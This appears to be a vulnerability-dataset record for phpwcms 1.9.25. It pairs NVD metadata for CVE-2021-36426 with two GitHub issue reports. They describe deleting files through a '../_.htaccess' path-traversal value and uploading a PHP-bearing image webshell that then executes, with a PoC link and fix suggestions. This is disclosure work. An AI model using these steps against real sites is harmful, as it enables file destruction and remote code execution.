field attributes of the first file, base64 decode the content, modify it to` ../_.htaccess` and encode it again, try to delete the _.htaccess file in the root directory ![image](https://user-images.githubusercontent.com/55659004/124233036-00592280-db45-11eb-8224-f677f388bce2.png) ![image](https://user-images.githubusercontent.com/55659004/124233097-123ac580-db45-11eb-9c92-da3e6a34b04b.png) ![image](https://user-images.githubusercontent.com/55659004/124233138-1bc42d80-db45-11eb-8d7b-c56cfcb9fb71.png) 调试查看变量值 Debug to view variable values ![image](https://user-images.githubusercontent.com/55659004/124233161-254d9580-db45-11eb-9ced-36b9f90e28a1.png) 文件被成功删除 The file was successfully deleted ![image](https://user-images.githubusercontent.com/55659004/124229855-ce45c180-db40-11eb-8dd6-324bf8387b2d.png) 修复建议: 1.过滤../等特殊字符。 2.限制目录访问权限。 Repair suggestions: 1. Filter ../ and other special characters. 2. Restrict directory access permissions.
Arbitrary file deletion vulnerability
https://api.github.com/repos/slackero/phpwcms/issues/311/comments
1
2021-07-02T06:23:48Z
2021-07-04T08:46:57Z
https://github.com/slackero/phpwcms/issues/311
935,459,137
311
4,685
CVE-2021-36426
2023-02-03T18:15:09.370
File Upload vulnerability in phpwcms 1.9.25 allows remote attackers to run arbitrary code via crafted file upload to include/inc_lib/general.inc.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/312" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/slackero/phpwcms/issues/312" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpwcms:phpwcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "684A8278-6B9C-4D17-A80E-7E59850A0ECD", "versionEndExcluding": "1.9.26", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/slackero/phpwcms/issues/312
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "slackero", "phpwcms" ]
在`include/inc_lib/general.inc.php` 1709行中,使用`getimagesize`获取了上传图像文件的大小信息。其后未对后缀名进行单独判断,可以制作图片木马进行上传绕过。 In the line 1709 of `include/inc_lib/general.inc.php`, use `getimagesize` to get the size information of the uploaded image file. After that, without a separate judgment on the suffix name, a picture Trojan horse can be made to upload and bypass. ![image](https://user-images.githubusercontent.com/55659004/124232116-d3f0d680-db43-11eb-984b-0cbe1b1d4fb4.png) 漏洞验证: Vulnerability recurrence:: 登录访问后台页面http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8 首先点击Create new campaign Login to visit the background page http://www.pw.com/phpwcms.php?csrftoken=0cc175b9c0f1b6a831c399e269772661&do=files&p=8 First click Create new campaign ![image](https://user-images.githubusercontent.com/55659004/124231446-d999ec80-db42-11eb-997f-5e47ce3af625.png) 创建任意条目,点击create To create any entry, click create ![image](https://user-images.githubusercontent.com/55659004/124231462-e0c0fa80-db42-11eb-944f-0d0a258d41f2.png) 回到上级,点击编辑 Go back to the upper level, click edit ![image](https://user-images.githubusercontent.com/55659004/124231491-e9b1cc00-db42-11eb-8e88-c5d23f748fc3.png) 选中生成好的图片马(在图片文件特殊位置插入php代码,不影响其打开),点击上传,出现报错不用管 poc下载:[2.zip](https://github.com/slackero/phpwcms/files/6752600/2.zip) Select the generated picture horse (insert the php code in the special position of the picture file, it will not affect its opening), click upload, and there will be an error and don’t care. pocdownload:[2.zip](https://github.com/slackero/phpwcms/files/6752600/2.zip) ![image](https://user-images.githubusercontent.com/55659004/124231632-1b2a9780-db43-11eb-97ac-8195a111057b.png) 上传后的文件目录为\content\marketing\+参数adcampaign_id,查看下该目录下生成的新文件,文件命名规则为日期_2 访问url:http://www.pw.com/content/marketing/3/20210701_2.php,成功执行php文件 The uploaded file directory is \content\marketing\+parameter adcampaign_id, check the new file generated in this directory, the file naming rule is date_2 Visit url: http://www.pw.com/content/marketing/3/20210701_2.php, successfully execute the php file ![image](https://user-images.githubusercontent.com/55659004/124232242-ff73c100-db43-11eb-8901-bcc9ac1c9465.png) 修复建议: 1.正确验证文件后缀。 2.限制目录执行权限。 Repair suggestions: 1. Verify the file suffix correctly. 2. Restrict directory execution permissions.
Arbitrary file upload vulnerability
https://api.github.com/repos/slackero/phpwcms/issues/312/comments
1
2021-07-02T06:42:16Z
2021-07-04T08:25:50Z
https://github.com/slackero/phpwcms/issues/312
935,469,326
312
4,686